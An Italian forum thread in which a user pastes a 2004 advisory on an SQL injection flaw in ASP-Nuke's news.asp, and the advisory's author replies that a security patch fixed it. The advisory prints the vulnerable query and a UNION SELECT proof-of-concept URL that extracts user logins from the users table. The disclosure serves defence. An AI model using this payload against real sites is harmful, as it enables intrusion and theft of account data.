Forum 

Forum AspNuke.it - Il tuo Portale OpenSource in ASP

sql injection forse gia risolta...?! se si come?!

Autore Messaggio
Arcanis

Avanzato
Avanzato
198 Discussioni



Profilo - Arcanis
28 giugno 2004 alle 22:53:02 Profilo - ArcanisInvia un messaggio privato Ser_Arcanis@libero.it Rispondi quotando
Modificato il 28 giugno 2004 alle 22:55:15

VI INCOLLO UN FILE TXT TROVATO IN RETE... QUALCHE SITO ASPNUKE HA QUESTO BUCO... NON SO' PERO SE CON L'ULTIMA PATCH E' STATO RISOLTO:

+ ------------------------+
+ ASP-NUKE +
+ SQL INJECTION +
+ 11/05/2004 +
+ ------------------------+

Prodotto: ASP-Nuke
Vulnerabilità: SQL Injection
Versioni vulnerabili: 1.2, 1.3, 1.4 alpha
Pagina: news.asp
Vulnerabilità scoperta da: Salvatore Aranzulla (mirabilweb) - mirabilweb@tiscali.it - http://www.hardwaremax.it

ASP-Nuke è un nuke opensource in ASP, come il PHP-Nuke, che permette la creazione di un sito web in ASP in poco tempo, senza grandi conoscenze tecniche.

Dopo le due vulnerabilità di SQL Injection scoperte dallo staff di ASP-Nuke (http://www.aspnuke.it) nelle pagine "gotoURL.asp" e "download.asp", ho deciso di analizzare a fondo il nuke ed è venuta a galla una nuova vulnerabilità di SQL Injection nella pagina "news.asp", tramite la quale sarebbe possibile risalire alla password dell'amministratore del sito.

Per la selezione della news viene usata (nella pagina includes/news-inc.asp, che è inclusa nella pagina news.asp) la seguente stringa SQL:

rSQL = "SELECT nID, nTitle, nAuthor, nDate, nHeader, nText, nImage, nURL, nRead, nCategory, cTitle, vCode FROM news, categories, versions WHERE nCategory=cID AND nVersion=vID AND nValid=True AND nID=" & iID

Come si nota nella variabile iID (che contiene l'ID della news) non vengono rimpiazzati gli apici e questo crea la vulnerabilità di SQL Injection.

Dimostrazione della vunerabilità:

http://localhost/news.asp?id=0; union all select uID,ulogin,ulogin,udate,ulogin,ulogin,uAIM,ulogin,0,ulogin,ulogin,0 from users

---------------------------------------------------------------------------------
(C) 2004 by Salvatore Aranzulla
(www.salvatore-aranzulla.splinder.it - mirabilweb@tiscali.it)
Puoi pubblicare questo articolo ovunque, purché sia inclusa la presente dicitura.
---------------
Arcanis

http://www.umbriafolk.eu
http://www.bottegadimagic.com

NOVITA' SU ASPNUKE BY ARCANIS...OH MA CHE CARINI MI HANNO DEFACCIATO L'ASPNUKE!
http://arcanis.somee.com
mirabilweb

Utente
Utente
56 Discussioni



Profilo - mirabilweb
01 luglio 2004 alle 08:44:42 Profilo - mirabilwebInvia un messaggio privato mw_computer@hotmail.com Rispondi quotando
ciao!
ah quello è il mio adivisories di sicurezza :) si lo hanno corretto con la security patch 2: http://www.aspnuke.it/download.asp?dl=129

Ciao da Salvatore Aranzulla!
---------------
Salvatore Aranzulla
http://www.hardwaremax.it
http://salvatore-aranzulla.splinder.it

Log in

Login
Password
Memorizza i tuoi dati:

Cerca

 

Sostieni AspNuke

Un piccolo gesto per aiutarci a mantenere AspNuke.it online

Promo

MusicWebItalia.it
Video Testi Traduzioni Spot Colonne sonore Accordi e Spartiti gratis.

Visitatori

Visitatori Correnti : 136
Membri : 0 offline Anna

Iscritti

 Utenti: 18940
Ultimo iscritto : glauco
Lista iscritti
Messaggi privati: 3373 Commenti: 2210 Immagini: 39 Downloads: 144 Articoli: 49 Pagine: 101 Siti web: 558 Notizie: 180 Sondaggi: 11 Preferiti: 5684679 Post sui forum: 51195 Libro degli ospiti: 4 Eventi: 7

Versioni

Temi